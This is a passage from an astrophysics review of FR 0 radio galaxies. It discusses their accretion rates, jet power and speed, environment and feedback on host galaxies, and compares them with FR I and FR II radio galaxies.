Current magneto-hydrodynamic simulations have produced a wide range of accretion discs coupled with jets (e.g., Meier et al. 2001; Ohsuga et al. 2009; Yuan and Narayan 2014). In the low-accretion regime (where \(\dot{L}_{\rm E}\) is typically less than 2% of the Eddington limit, Heckman and Best 2014), ADAF discs are prone to launching jets (Narayan and Yi, 1995). An ADAF system can evolve under standard and normal evolution (SANE, e.g. Narayan et al. 2012) and magnetically arrested disc (MAD, e.g. Bisnovatyi-Kogan and Ruzmaikin 1974; Narayan et al. 2003; Tchekhovskoy et al. 2011) configurations: in the former the disc is not significantly threaded with poloidal magnetic flux, while in the latter the magnetic flux threading the BH horizon becomes so large that the magnetic pressure of the jet can temporarily stop the flow of matter into the BH. Current interest in MAD accretion is driven by the finding that it leads to the launch of powerful relativistic jets. In fact, for M87, strongly magnetized (MAD) disc models remain the most favourable solutions for reproducing the EHT results (e.g. Event Horizon Telescope Collaboration et al. 2021).
This result strengthens the common interpretation that low-power RGs (generally FR Is, such as M 87) are probably powered by ADAF (MAD-type?) discs with low \(\dot{m}\) and low radiative efficiencies, which channel a small fraction of the disc plasma into the relativistic jet (e.g., Nagar et al. 2000; Falcke et al. 2000; Ho 2002; Hardcastle and Worrall 2000; Balmaverde and Capetti 2006a; Zanni et al. 2007; Ho 2008; Balmaverde et al. 2008; Hardcastle et al. 2009). To study the accretion and ejection characteristics of low-power RGs, broad-band empirical relations have been used to gauge the disc and jet energetics. For the accretion-related argument, we must rely on various proxies for the bolometric AGN luminosity based on the radiation that is not fully obscured by the torus and escapes or is reprocessed. Thanks to its wide availability, the radiative bolometric luminosity or accretion power can be estimated from the optical [O III] emission line, L\({}_{\rm Bol}\) = 3500 L\({}_{\rm[O~{}III]}\) (for LLAGN, Heckman et al. 2004), as the AGN emission excites the gas clouds in the narrow line region, which re-emit the [O III] line almost isotropically. This quantity is a good, but not optimal, proxy since internal obscuration and stellar contamination can affect the measurement. L\({}_{\rm[O~{}III]}\) represents an upper limit on the accretion power for jet-dominated AGN, LERGs (generally not affected by nuclear dust obscuration), where jet shocks, rather than the underluminous RIAF disc, can cause the [O III] emission (Capetti et al., 2005). The AGN jets are observable through their synchrotron emission. The mechanical (kinetic) power of the jets, \(L_{\rm Mech}\), has been estimated by using different assumptions. The monochromatic radio luminosity represents only a small fraction of the energy carried by the jets, about 2 orders of magnitude smaller than the total \(L_{\rm mech}\) (Scheuer, 1974). However, recalibrating this relationship with physical constraints (e.g. synchrotron spectral ageing, radiative losses, content of particles and magnetic fields) has yielded

\[L_{\rm mech}=7\times 10^{36}\,f\,(L_{\rm 1.4\,GHz}/10^{25}\,{\rm W\,Hz^{-1}})^{0.68}\,{\rm W} \tag{3}\]

as estimated by Heckman and Best (2014). This relation was obtained by studying the jet mechanical energy as the \(pV\) work done by the jet to inflate cavities found in hot X-ray emitting halos (Rafferty et al., 2006; Birzan et al., 2008; Cavagnolo et al., 2010). The jet energy can also be estimated from synchrotron emission using the minimum energy condition in the radio lobes in an equipartition regime (i.e. the internal energy is almost equally divided between magnetic field and relativistic particles) (Willott et al., 1999; O'Dea et al., 2009; Daly et al., 2012). The \(f\) factor includes all the uncertainties on the physical state of the lobes, such as the particle composition, SED, volume filling factor, possible deviations from the equipartition and adiabatic conditions, turbulence, and additional heating from shocks. Heckman and Best (2014) adopted \(f=4\) based on the best linear relation of the data. We note that these empirical assumptions, set on samples of FR Is and FR IIs, may not be entirely applicable to FR 0s (Grandi et al., 2021). However, we choose to use this value to be consistent with previous works on low-power RGs (e.g. Heckman and Best 2014). The left panel of Fig. 12 depicts the Eddington ratio (\(L_{\rm Bol}/L_{\rm Edd}\)) distributions for FR0CAT, FRICAT and CoreG galaxies. FR 0s and FR Is have similar rates, \(10^{-5}\,\)-\(\,10^{-2}\).
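To make the above bookkeeping concrete, the following minimal Python sketch combines the two estimators discussed here (the [O III]-based bolometric power and the mechanical power of Eq. 3 with \(f=4\)) into Eddington-ratio proxies. The input luminosities, the BH mass and the function names are illustrative assumptions, not catalogue values.

```python
# Minimal sketch of the accretion/jet power proxies discussed in the text.
# The example inputs below are illustrative, not measured catalogue values.

L_EDD_PER_MSUN = 1.26e31   # Eddington luminosity per solar mass [W]
F_CAV = 4.0                # cavity calibration factor adopted by Heckman and Best (2014)

def l_bol(l_oiii_W):
    """Bolometric AGN power from the [O III] line: L_Bol = 3500 L_[O III] (LLAGN)."""
    return 3500.0 * l_oiii_W

def l_mech(l_14ghz_W_per_Hz, f=F_CAV):
    """Jet mechanical power from Eq. 3: 7e36 f (L_1.4GHz / 1e25 W Hz^-1)^0.68 [W]."""
    return 7e36 * f * (l_14ghz_W_per_Hz / 1e25) ** 0.68

def eddington_ratios(l_oiii_W, l_14ghz_W_per_Hz, m_bh_msun):
    """Return the radiative (L_Bol/L_Edd) and total ((L_Bol+L_Mech)/L_Edd) accretion rates."""
    l_edd = L_EDD_PER_MSUN * m_bh_msun
    lb, lm = l_bol(l_oiii_W), l_mech(l_14ghz_W_per_Hz)
    return lb / l_edd, (lb + lm) / l_edd

# Illustrative FR 0-like numbers: L_[O III] ~ 1e32 W (1e39 erg/s),
# L_1.4GHz ~ 1e23 W/Hz, M_BH ~ 10^8.5 M_sun.
print(eddington_ratios(1e32, 1e23, 10 ** 8.5))
```

With these fiducial inputs both ratios fall in the \(10^{-5}\) - \(10^{-2}\) range quoted above for FR 0s and FR Is.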
A Kolmogorov--Smirnov (KS) test indicates that the two distributions are not drawn from different parent populations (\(P=0.0059\)). Conversely, CoreG have significantly lower accretion rates, \(<10^{-4}\). Since a large amount of the infalling gas is launched into the jet without feeding the BH (Zanni et al., 2007), another method to estimate the total accretion is by adding the jet kinetic power to the radiative power as follows: \(\dot{L}_{\rm E,tot}=(L_{\rm Bol}+L_{\rm Mech})/L_{\rm Edd}\). The right panel of Fig. 12 shows the distribution of this total accretion rate estimator for the different groups of sources. The CoreG generally have lower total accretion rates than the FR 0s and FR Is. However, there is a considerable overlap between the populations of FR 0s and FR Is, \(\dot{L}_{\rm E,tot}\sim 10^{-4}\,\)-\(\,10^{-2}\). A KS test confirms that the cumulative distribution function of FR 0s is not significantly different from that of FR Is (\(P=5.0\times 10^{-17}\)). These results confirm the X-ray study of Torresi et al. (2018) that FR 0 BHs are fed at low rates, consistent with jet-mode AGN and RIAF-type accretion states (Heckman and Best, 2014). CoreG, being low-power FR 0s, also have lower accretion rates than FR0CAT objects.

Figure 12: Histograms of BH accretion rates estimated as Eddington ratio, \(\rm L_{\rm Bol}/L_{\rm Edd}\) (left panel), and as total accretion rate, (\(\rm L_{\rm Bol}+L_{\rm Mech}\))/\(\rm L_{\rm Edd}\) (right panel), for FR0CAT objects (black solid line), FRICAT objects (red dashed line) and CoreG (green dot-dashed line).

Broad-band proxies for accretion and kinetic jet powers are expected to broadly correlate in RLAGN, corresponding to two parallel empirical relations valid for the two accretion states (e.g. Rawlings and Saunders, 1991; Willott et al., 1999; Buttiglione et al., 2010; Capetti et al., 2023). For AGN-dominated RLAGN (HERGs), the correlation between radio and optical (continuum) or X-ray emission probably results from a combination of thermal and non-thermal emission from disc and jet (e.g., Chiaberge et al., 2002; Hardcastle and Worrall, 2000; Baldi et al., 2019). For jet-dominated RLAGN (LERGs), the correlation between the two luminosity proxies is best explained as the result of a single emission process in the two bands, i.e. non-thermal synchrotron emission from the relativistic jet (e.g., Chiaberge et al., 1999; Balmaverde et al., 2006; Mingo et al., 2014), launched by a RIAF disc as supported by multiple theoretical and analytical studies (e.g. Meier, 2001; Begelman, 2012; McKinney et al., 2012). This result has also been found valid for low-luminosity AGN, where a compact jet dominates the broad-band continuum emission (e.g. Nagar et al., 2002; Ho, 2008; Fernandez-Ontiveros et al., 2023). Balmaverde et al. (2008) found that for 3C/FR Is and CoreG the accretion power correlates linearly with the jet power, with an efficiency of conversion from rest mass into jet power of \(\sim\)0.012. An [O III]-radio correlation found for FR Is, FR 0s, CoreG, and RL low-power LINERs (e.g. Verdoes Kleijn et al., 2002; Nagar et al., 2005; Balmaverde and Capetti, 2006; Baldi et al., 2015, 2019, 2021b, see also Fig. 9)
suggests a similar ionising central source, where a scaled-down accretion rate for the core-dominated sources explains a likewise scaled-down jet power with respect to the more powerful 3C/FR Is (Balmaverde et al., 2008).

Figure 13: Parsec-scale core radio power (erg s\({}^{-1}\) Hz\({}^{-1}\)) vs. [O III] line luminosity (erg s\({}^{-1}\)) for different samples of LINER-type RLAGN hosted in ETGs with core-brightened morphologies (see the legend): FR 0s (red filled dots) from Cheng and An (2018); Cheng et al. (2021); Baldi et al. (2021); Giovannini et al. (2023), RL LINERs from the Palomar sample from Ho et al. (1995) (green empty dots), 3C/FR Is (upwards orange triangles), Core Galaxies (downward pink triangles). The dotted line indicates the best linear correlation.

By focusing on the parsec-scale radio emission, the higher resolution of VLBI observations probes a section of the jet base 'closer' to the launching site, and thus more sensitive to the BH-accretion properties, than that detected with the VLA at arcsec resolution. In fact, an analogous \(L_{\rm[O~{}III]}\)-\(L_{\rm VLBI~{}core}\) correlation has been reported by Baldi et al. (2021) over \(\sim\)4 orders of magnitude (Fig. 13) for RGs with comparable properties, e.g. hosted in massive ETGs and characterised by a LINER spectrum (FR Is, FR 0s, CoreG, RL LLAGN). By also including the new VLBI data for FR 0s from Giovannini et al. (2023), we fit the data points present in this sequence with a power-law relation. We find a robust correlation in the form \(L_{\rm[O~{}III]}\propto L_{\rm VLBI~{}core}^{0.58\pm 0.06}\) with a Pearson correlation coefficient of 0.767, which indicates that the probability that the two quantities are uncorrelated is smaller than \(8\times 10^{-14}\). This statistically-robust relationship corroborates the idea that the model of a RIAF disc with core-brightened jets of FR Is is also applicable to FR 0s and LINER-like RLAGN in general. The large scatter of the correlation, \(\sim\)0.28 dex, could be caused by Doppler boosting, nuclear variability and a non-flat spectral index (1.4 - 8 GHz). However, there is no clear evidence for a strong Doppler-boosting effect in FR 0s (higher radio luminosities than implied by the linear correlation) for the one-sided jets or highly variable sources, suggesting that the jet spine is not highly relativistic and/or prominent (see Sect. 12 for more discussion on jet structure).

Figure 14: The core dominance, measured as the ratio between VLA 5-GHz core and NVSS 1.4-GHz flux densities, for FR0CAT sources (black filled dots), FRICAT sources (red circles) and CoreG (green squares) as a function of total accretion rate (L\({}_{\rm Bol}\) + L\({}_{\rm Mech}\))/L\({}_{\rm Edd}\). We exclude sources with core dominance \(>\)1 because they are probably affected by variability or systematic errors.

The accretion-ejection coupling can also be explored by comparing the core dominance, a proxy of the jet brightness structure (i.e. how much the core shines over the extended jet emission), with the total accretion rate, \(\dot{L}_{\rm E,tot}\). Figure 14 presents the distribution of these two quantities for FR0CAT, FRICAT and CoreG galaxies (excluding the few sources with core dominance \(>\)1, possibly due to variability or systematic errors). Although the core dominance naturally saturates at 1 as the source becomes weaker (and the radio spectrum flatter, Dabhade and Gopal-Krishna, 2023), there is a general tendency for RGs to increase their core dominance with decreasing accretion rate. These results suggest that the capability of a RG to develop kpc-scale structures is related to its accretion properties: more core-brightened structures are associated with lower-\(\dot{m}\) sources.
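As an illustration of the fitting procedure behind the \(L_{\rm[O~{}III]}\)-\(L_{\rm VLBI~{}core}\) relation quoted above (a power law fitted in log-log space, with the Pearson coefficient quantifying the significance), the sketch below runs the same steps on synthetic data; the generated points and the printed numbers are placeholders, not the actual FR 0/FR I/CoreG measurements.

```python
import numpy as np
from scipy import stats

# Sketch of a log-log power-law fit with a Pearson significance test.
# The data below are synthetic placeholders, not the real samples.
rng = np.random.default_rng(0)
log_Lcore = rng.uniform(20.0, 24.0, 60)                                  # fake core powers
log_Loiii = 38.0 + 0.58 * (log_Lcore - 21.0) + rng.normal(0.0, 0.3, 60)  # fake line luminosities

fit = stats.linregress(log_Lcore, log_Loiii)
print(f"L_[O III] ~ L_core^({fit.slope:.2f} +/- {fit.stderr:.2f})")
print(f"Pearson r = {fit.rvalue:.3f}, probability of no correlation = {fit.pvalue:.1e}")
```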
The jet efficiency, i.e. the fraction of the kinetic jet power produced with respect to the AGN accretion power, offers a good diagnostic to investigate the nature of the nuclei of RGs. The \(L_{\rm Mech}/L_{\rm Bol}\sim\eta/\epsilon\) ratio (\(\eta\) and \(\epsilon\) are the fractions of gravitational energy converted into jet power and thermal radiation, respectively) directly measures the ability of the system to channel gravitational energy into the jet rather than to dissipate it in thermal radiation. Figure 15 depicts \(\eta/\epsilon\) for FR0CAT, FRICAT and FRIICAT objects (Grandi et al., 2021).

Figure 15: \(L_{\rm 1.4\,GHz}/L_{\rm Edd}\) versus \(L_{\rm[O\ III]}/L_{\rm Edd}\) of FRCAT sources (FR 0s, FR Is and FR IIs) compared to the predicted values of kinetic jet power estimated by Equation 3 assuming \(f=5\). Each line in the plots corresponds to a different value of \(\eta/\epsilon\). Since a change of the BH mass has only a minor impact on the predicted \(\eta/\epsilon\) curves, we plot (solid and dotted) lines corresponding to \(M_{\rm BH}=10^{7.5}\) and \(M_{\rm BH}=10^{9.5}\)\(M_{\odot}\). Image reproduced with permission from Grandi et al. (2021), copyright by the author(s).

Neglecting the \(f\) and \(M_{\rm BH}\) effects on the jet efficiency, whereas HERGs favour a thermal dissipation of the gravitational power, the different LERG types, powered by similarly inefficient accretion flows, launch jets with different luminosities and different jet efficiencies: FR 0s appear less efficient than FR Is in extracting energy from their BHs into the jets. At parsec scale, a comparison between FR 0 and classical 3C/FR I jets can help us understand the reason why FR 0s do not develop large structures. 3C/FR Is generally exhibit core-brightened radio morphologies in VLBI observations (Fanti et al., 1987; Venturi et al., 1995; Giovannini et al., 2005) and FR 0s occasionally show similar morphologies when resolved. However, the degree of jet asymmetry and the ratio between one-sided and two-sided jets appear different between the two classes. In FR Is, the effect of Doppler boosting on the jet sidedness, i.e. the jet-to-counter-jet flux ratio, decreases from VLBI to VLA observations and is typically larger than 3 at parsec scale (Bridle, 1984; Parma et al., 1987; Giovannini et al., 1990; Venturi et al., 1995; Xu et al., 2000; Giovannini et al., 2001). On the basis of the link between jet speed and asymmetry, this result is interpreted as a change of the FR I jet bulk speed from relativistic, \(\Gamma>\)3, to sub-relativistic speeds on kpc scales by deceleration, possibly due to entrainment of external material (Bicknell, 1984, 1995; Bowman et al., 1996; Laing and Bridle, 2014; Perucho et al., 2014). For FR 0s the jet sidedness is less prominent: only one third of the FR 0s have a jet sidedness larger than 2 at parsec scale (Fig. 16). This is clear observational evidence that the jet bulk speed of FR 0s is significantly smaller than that of FR Is. Following the procedure discussed by Bassi et al. (2018), we can roughly estimate the bulk Lorentz factor \(\Gamma\) of the jet, although with a strong assumption on the unknown orientation: \(\Gamma_{\rm bulk}\) is computed for the angle of the jet to the line of sight, \(\theta_{m}\), that maximizes \(\beta=v/c\).

Figure 16: Distributions of the logarithm of \(R_{\rm JC}\), the jet-to-counter-jet flux ratio, for the FR 0s (top panel) from Giovannini et al. (2023) and the FR I/FR II RGs from the Bologna Complete Sample (BCS, bottom panel, from Liuzzo et al. 2009). The dashed histograms correspond to lower limits on the jet sidedness. Image reproduced with permission from Giovannini et al. (2023), copyright by the authors.
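For reference, the sketch below encodes the standard beaming relation linking the jet-to-counter-jet ratio to the bulk speed, \(R_{\rm JC}=((1+\beta\cos\theta)/(1-\beta\cos\theta))^{p}\) with \(p=2+\alpha\) for a continuous jet; the exponent convention and the \(\theta=0\) limit (which gives the minimum \(\beta\) and \(\Gamma\) compatible with a given ratio) are generic textbook assumptions and not necessarily the exact prescription of Bassi et al. (2018) adopted in the text.

```python
import math

# Jet-to-counter-jet flux ratio of an intrinsically symmetric, continuous jet:
#   R_JC = ((1 + beta*cos(theta)) / (1 - beta*cos(theta)))**p,  p = 2 + alpha
# Given an observed R_JC, beta*cos(theta) follows; theta = 0 yields the minimum
# beta (and Gamma) compatible with that ratio. Generic illustration only.

def beta_cos_theta(r_jc, alpha=0.0):
    p = 2.0 + alpha
    x = r_jc ** (1.0 / p)
    return (x - 1.0) / (x + 1.0)

def gamma_min(r_jc, alpha=0.0):
    beta = beta_cos_theta(r_jc, alpha)   # beta evaluated at theta = 0
    return 1.0 / math.sqrt(1.0 - beta ** 2)

for r in (2.0, 5.0, 10.0):
    print(f"R_JC = {r:4.1f}: beta >= {beta_cos_theta(r):.2f}, Gamma >= {gamma_min(r):.2f}")
```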
With these assumptions, and considering the observed range of jet sidedness (\(<10\)), \(\Gamma_{\rm bulk}\) for FR 0s is typically \(<\)2.5. This result concurs with the low jet proper motions measured by Cheng and An (2018) and Cheng et al. (2021). In conclusion, although FR 0s and FR Is share comparable accretion properties, the jets of the former appear less efficient and slower, mildly relativistic at parsec scales, with a bulk velocity which does not exceed 0.5\(c\). However, a proper systematic analysis of larger samples of FR 0s is needed to draw a final conclusion on their accretion-ejection state.

## 9 Environment

The kpc- and Mpc-scale environmental properties (e.g. clustering, ICM, location within the cluster/group, relative galaxy velocity) can regulate the accretion and ejection states of an active BH: e.g. bright cluster galaxies at the centre of dense environments typically host a RG and have different merger histories and fueling properties than galaxies at the cluster outskirts moving away from the centre (e.g. Lin et al., 2010; Vattakunnel et al., 2010; Shlosman, 2013; Kormendy and Ho, 2013; Conselice, 2014). Understanding the relationship between RLAGN activity and their environment is essential for a comprehension of BH-host evolution, AGN triggering and life cycles, and for calibrating feedback processes in cosmological models (e.g., Husko et al., 2023). However, the role of the environment in shaping RLAGN is still not clear (e.g. Best, 2004; Ineson et al., 2013, 2015; Ching et al., 2017; Macconi et al., 2020). The FR I/II dichotomy is believed to depend on the jet interaction with the environment (e.g. Laing et al., 1994; Kaiser et al., 1997), or on host properties (Ledlow and Owen, 1996), apart from mechanisms associated with jet production itself (e.g. Meier, 2001). At small scales, the similarity between the host types of FR 0s and FR Is suggests that the galactic gas conditions of the two classes are rather comparable. More precisely, the smaller optical host masses of the FR 0s with respect to those of FR Is argue against the idea of a dense galaxy-scale environment which could cause the jet deceleration and disruption through the interaction with the ISM (Kaiser and Best, 2007). The sparse X-ray studies of FR 0s provide no evidence for a hot-gas halo (which typically permeates the atmospheres of elliptical galaxies) denser than that of FR I hosts. The large-scale environment is typically invoked to explain the deceleration and confinement of FR I jets with respect to FR IIs, since FR Is typically reside in denser environments (denser coronae and richer groups/clusters, e.g. Prestage and Peacock, 1988; Hill and Lilly, 1991; Zirbel, 1997; Gendre et al., 2013; Laing and Bridle, 2014; Massaro et al., 2019, 2020). Several studies on the Mpc-scale environment of RL CRSs have confirmed that they inhabit dense environments, but the presence of environmental differences with respect to FR Is has been questioned. Torresi et al. (2018) found that at least 50% of the FR 0s live in a dense X-ray environment, reflecting the massive dark matter halos in which these objects are embedded. Vardoulaki et al. (2021), studying the VLA-COSMOS Large Project, found that FR I/IIs and compact AGN are found in environments of all types and densities (group or cluster, filaments, field), regardless of their radio structures.
Miraghaei and Best (2017) found only a marginal trend for RL CRSs to lie in denser environments. In this direction, Capetti et al. (2020) found that FR0CAT sources do indeed live in rich environments, but with a density lower, by a factor of 2 on average, than that of FR Is, and that about two thirds of FR 0s are located in groups containing \(<\)15 members. A similar result was found by Prestage and Peacock (1988), who argued that RL CRSs lie in regions of lower galactic density than extended sources. In addition, Massaro et al. (2020) concluded that nearby BL Lacs share similar clustering properties with FR 0s, suggesting a common parental population. In conclusion, there is growing evidence of an environmental difference (at least at large scales) between FR 0s and FR Is (and extended RGs in general), which would imply a different cosmological evolution between the two classes.

## 10 Feedback

AGN feedback comes in two flavours: quasar and radio (or maintenance) mode (e.g. see Croton et al., 2006; Best, 2007; Fabian, 2012; Bower et al., 2012; Heckman and Best, 2014; Harrison, 2017). While the former mode is associated with powerful radiatively dominated AGN, i.e. quasars (and HERGs) with high Eddington ratios (\(\dot{L}_{E}>\) 0.01), the radio mode is attributed to BHs with low accretion rates (\(\dot{L}_{E}<\) 0.01, mainly LERGs). The latter release most of their energy in the form of jets, preventing strong cooling flows in galaxy clusters (e.g. Fabian et al., 2003), and regulating the level of SF in their host galaxies (e.g. Best et al., 2006). It is only with the advent of deep multi-band radio surveys, with their combination of high sensitivity to both compact and extended emission (Shimwell et al., 2017), that we are now able to systematically study the effects of galactic-scale feedback from RL CRSs (e.g. Bicknell et al., 2018). In contrast, powerful quasars have jets that rapidly "drill" through the ISM, depositing most of the energy in the intergalactic medium. Observational evidence continues to mount that lower-power (\(L_{\rm 1.4\,GHz}\lesssim 10^{24}\,{\rm W\,Hz}^{-1}\)) jetted AGN may have a significant impact on their hosts through jet-ISM interactions on small (\(\sim\)1-10 kpc) scales, where the jets heat, expel, or shock the ambient ISM, thereby altering the SF efficiency (e.g., Nyland et al., 2013; Jarvis et al., 2019, 2021; Webster et al., 2021; Grandi et al., 2021; Venturi et al., 2021). State-of-the-art jet simulations (e.g. Sutherland and Bicknell, 2007; Wagner and Bicknell, 2011; Mukherjee et al., 2016, 2018; Bicknell et al., 2018; Rossi et al., 2020; Talbot et al., 2022; Tanner and Weaver, 2022) provide further support to this scenario, demonstrating that lower-power jets are susceptible to disruption and entrainment, which increases the volume and timescale of the feedback, as well as the amount of energy transferred to the ISM (\(>\) 5-10% of the bolometric power). FR 0s, showing galaxy-scale jetted emission, could play a critical role in radio-mode feedback. In fact, they are the best candidates to provide continuous energy injection into the ISM: although accreting at low rates (\(\dot{L}_{E}<0.02\)), their jets are fully embedded in the host, with most of the energy deposited in the ISM, on smaller physical scales (the galactic medium) than those (the inter-galactic medium) affected by the full-fledged jets of FR I/IIs.
Nevertheless, the role of FR 0s, and of the jetted LLAGN population in general, in the context of feedback has only just started to be explored (e.g., Kharb and Silpa, 2023; Krause, 2023; Goold et al., 2023). Vardoulaki et al. (2021) showed a comparable radio-mode quenching of SF in the hosts of RL CRSs and of FR I/IIs. In fact, while compact RGs can also be found in less massive hosts (\(10^{9.5}\,-\,10^{11.5}\,M_{\odot}\)) than FR I/IIs, the former also have low specific SF rates and long times since the last burst of SF, derived from SED fitting (Delvecchio et al., 2017), similar to those of the latter. RL CRS hosts lie in cooler X-ray groups than extended RGs, with average inter-galactic medium temperatures of \(\sim\)1 keV. Additionally, the older the episode of SF, the cooler the X-ray group in which RL CRSs lie, suggesting a SF shutdown by kinetic feedback. A dense cold or hot phase in the ISM can increase the chances of detecting signatures of an active radio-mode feedback. Best et al. (2000) showed that compact radio sources smaller than 90 kpc have emission line nebulae with lower ionization, higher luminosity, and broader line widths than in larger radio sources, consistent with shocks driven by the jets or outflows, typically observed in dust-shrouded young RGs. Low-luminosity jets can also carry enough power to shock and remove the cold/hot gas (e.g. Morganti et al., 2018, 2021; Murthy et al., 2022), as demonstrated by some cases with observed disturbed gas kinematics, absorption features and LINER-like line emission in compact sources (e.g. Holt et al., 2008; Glowacki et al., 2017; Baldi et al., 2019; Tadhunter et al., 2021). The detection of X-ray cavities in low-power RLAGN (\(<10^{23}\,\mathrm{W}\,\mathrm{Hz}^{-1}\)) demonstrates the ability of their jets to inflate bubbles in the hot-gas atmosphere (Birzan et al., 2004; Allen et al., 2006). Nevertheless, ordinary FR 0s are not expected to drive strong outflows in a dense ISM. The first dedicated study which has observationally addressed the radio-mode feedback of FR 0s is by Ubertosi et al. (2021), who found two putative X-ray cavities and two prominent cold fronts possibly associated with the jet activity of a FR 0 (with a bolometric luminosity of the order of \(10^{40}\,\rm erg\,s^{-1}\)) hosted by a brightest cluster galaxy (in the cluster Abell 795) (Fig. 17). The estimated cavity power and the cooling luminosity of the ICM follow the well-known scaling relations (e.g. McNamara and Nulsen 2007, 2012), providing strong evidence for self-regulated feedback in this source. Being fuelled by the inflow of a cold, spiral-shaped ICM, the central AGN inflates radio cocoons that excavate X-ray depressions and drive shocks in the ICM, which slosh and heat the gas, establishing a feedback loop. However, a systematic study of the feedback for a large sample of FR 0s is still missing, mainly because of the great difficulty of detecting low-brightness X-ray cavities related to small jets.

Figure 17: Panel a: Chandra image (0.5–2 keV) of the cluster A795; the ICM peak and the position of the FR 0 are indicated. Panel b: the Chandra image after subtraction of a model of the ICM brightness profile, over the same region as panel a. Panel c: temperature map of A795. In each panel, the arrows highlight the ICM spiral geometry. Image reproduced with permission from Ubertosi et al. (2021), copyright by the author(s).
To roughly estimate the impact of FR 0 jets on galaxies, assuming that the X-ray atmosphere is regulated by the jet activity, we compare the internal energy within the jets with the energy of the hot X-ray emitting gas in the host, similar to the analysis performed by Webster et al. (2021) for galaxy-scale jets. First, to calculate the jet energetics, we assume that the radio emission comes from a cylindrical region 5\({}^{\prime\prime}\) long with a radius of 0.3\({}^{\prime\prime}\) (based on the radio observations of Baldi et al. 2019). By using a Python code (pysynch, Hardcastle et al. 1998) we derive the minimum energy density and the minimum total energy, which is of the order of \(\sim 5\times 10^{48}\) - \(10^{50}\) J, by considering radio flux densities between 5 and 500 mJy, consistent with FR0CAT sources. Second, to estimate the energy within the hot ISM, several assumptions are needed. Since the small jets of FR 0s should have a larger impact on the bulge, we estimate the bulge mass from the BH mass distribution of the FR0CAT, \(10^{7.5}\) - \(10^{9}\,M_{\odot}\), using the McConnell and Ma (2013) scaling relation for ETGs. We then fix the hot gas mass fraction to 5% (e.g., Dai et al. 2010; Trinchieri et al. 2012). Assuming an average particle mass of \(0.62\,m_{\rm proton}\) and a typical gas temperature of 0.5 keV (Goulding et al., 2016), we can then estimate the internal energy of the hot phase in the bulge, which is of the order of \(\sim 10^{50}\) - \(3\times 10^{51}\) J. Finally, the total jet energy of FR 0s turns out to be \(\sim\)3-5% of the total binding energy of the bulge. However, bear in mind that minimum-energy estimates represent only a lower limit on the jet energy, since the jets must also displace the ISM and produce shocks, and their enthalpy for a relativistic gas undergoing adiabatic expansion could be \(>4pV\) (Birzan et al., 2004; Croston et al., 2007; Hardcastle and Krause, 2013). In addition, the estimated internal jet energy could be lower than the kinetic jet energy, which can be calculated with the method of Willott et al. (1999) from the 151-MHz luminosity. In fact, by considering the LOFAR 150-MHz luminosities of the FR0CAT, \(10^{38}\) - \(10^{40}\,\rm erg\,s^{-1}\), the jet output is of the order of \(1\times 10^{43}\) - \(4\times 10^{44}\,\rm erg\,s^{-1}\). This evaluation also considers the uncertainties on the factor \(f\) (\(<\)20, Hardcastle et al. 2007 for FR Is), which includes the effects of the jet structure and its environment (Willott et al., 1999). Assuming a lifetime of the jet activity of \(10^{7}\) yr, the kinetic jet energy would be in the range \(\sim 3\times 10^{50}\) - \(6\times 10^{51}\) J. These can be considered as upper limits on the jet energetics. In this case, the jet energetics would balance the ISM energy. We conclude that the FR 0 jets are potentially capable of affecting the ISM properties, at least in the bulge. Current hydrodynamical simulations (Horizon-AGN, Dubois et al. 2014; Illustris, Vogelsberger et al. 2014; EAGLE, Schaye et al. 2015; MUFASA, Dave et al. 2016; SIMBA, Dave et al. 2019; SWIFT, Schaller et al. 2023) implement quasar- and radio-mode feedback with a typical efficiency of 5-10%, assuming that the energy deposited back into the ISM scales directly with the accretion rate. The ratio (\(\rm L_{Mech}\))/(\(\rm L_{Bol}\)+\(\rm L_{Mech}\)) provides a measure of the fraction of the total accreted energy released back into the ISM in mechanical form in jets.
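A minimal numerical sketch of the bulge energy budget estimated above, using the fiducial numbers quoted in the text (5% hot-gas fraction, mean particle mass \(0.62\,m_{\rm proton}\), \(kT=0.5\) keV); the McConnell and Ma (2013) coefficients used to invert the BH-bulge relation are approximate, and the pairing of minimum jet energies with BH masses is an illustrative assumption.

```python
import math

# Order-of-magnitude estimate of the thermal energy of the hot gas in the bulge,
# compared with the minimum jet energies quoted in the text. Fiducial numbers only.
M_SUN = 1.989e30        # kg
M_PROTON = 1.6726e-27   # kg
KEV = 1.602e-16         # J

def bulge_mass_msun(m_bh_msun):
    """Approximate inversion of log(M_BH) ~ 8.46 + 1.05 log(M_bulge / 1e11 M_sun)."""
    return 1e11 * 10 ** ((math.log10(m_bh_msun) - 8.46) / 1.05)

def hot_gas_thermal_energy(m_bh_msun, gas_fraction=0.05, mu=0.62, kT_keV=0.5):
    m_gas = gas_fraction * bulge_mass_msun(m_bh_msun) * M_SUN   # hot-gas mass [kg]
    n_particles = m_gas / (mu * M_PROTON)
    return 1.5 * n_particles * kT_keV * KEV                     # J (ideal monatomic gas)

# Pair the low/high ends of the quoted minimum jet energies with low/high BH masses.
for log_mbh, e_jet in ((7.5, 5e48), (9.0, 1e50)):
    u_hot = hot_gas_thermal_energy(10 ** log_mbh)
    print(f"M_BH = 1e{log_mbh} M_sun: U_hot ~ {u_hot:.1e} J, E_jet,min/U_hot ~ {e_jet / u_hot:.1%}")
```

The resulting few-per-cent ratios are consistent with the \(\sim\)3-5% quoted above for the minimum jet energies.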
We measured this ratio for the FR 0s and FR Is from the FRCAT samples and found that all deposit more than 10% (on average 30% for FR 0s) of their accreted energy back into the galaxy. This calculation confirms the result of Whittam et al. (2018, 2022) that LERGs in general have higher feedback efficiencies and are thus thought to be more responsible for the maintenance mode of mechanical feedback than HERGs, which, being on average more powerful FR IIs than LERGs, generally deposit their energy at larger distances in the ICM.

## 11 Comparison with FR II LERGs

Deep optical-radio surveys have unearthed a large population of low-luminosity FR II LERGs (Capetti et al., 2017; Jimenez-Gallardo et al., 2019; Webster et al., 2021), which show kpc-scale edge-brightened radio morphologies, smaller (\(>\)30 kpc) and less luminous (\(\sim 10^{41}\,\rm erg\,s^{-1}\)) than the Mpc-scale powerful 3C/FR II LERGs. Their nuclear properties (luminosity, accretion rates) can still be reproduced by a RIAF disc, consistent with the general jet-mode LERG population (Heckman and Best, 2014). Macconi et al. (2020) suggested that FR II LERGs are characterised by intermediate properties between FR Is and FR II HERGs, since they populate an intermediate region of a correlation between accretion rates and environmental richness. Conversely, Capetti et al. (2023) found that FR II LERGs are among the most luminous radio sources in the Universe (up to radio powers of \(10^{35}\,\rm erg\,s^{-1}\) Hz\({}^{-1}\)). Tadhunter (2016) argued that FR II LERGs represent a phase of the RG evolution, when the accretion has recently switched off or leveled down from an FR II HERG high state, after exhausting the cold gas. However, preliminary studies on the properties of the warm ionised and cold molecular 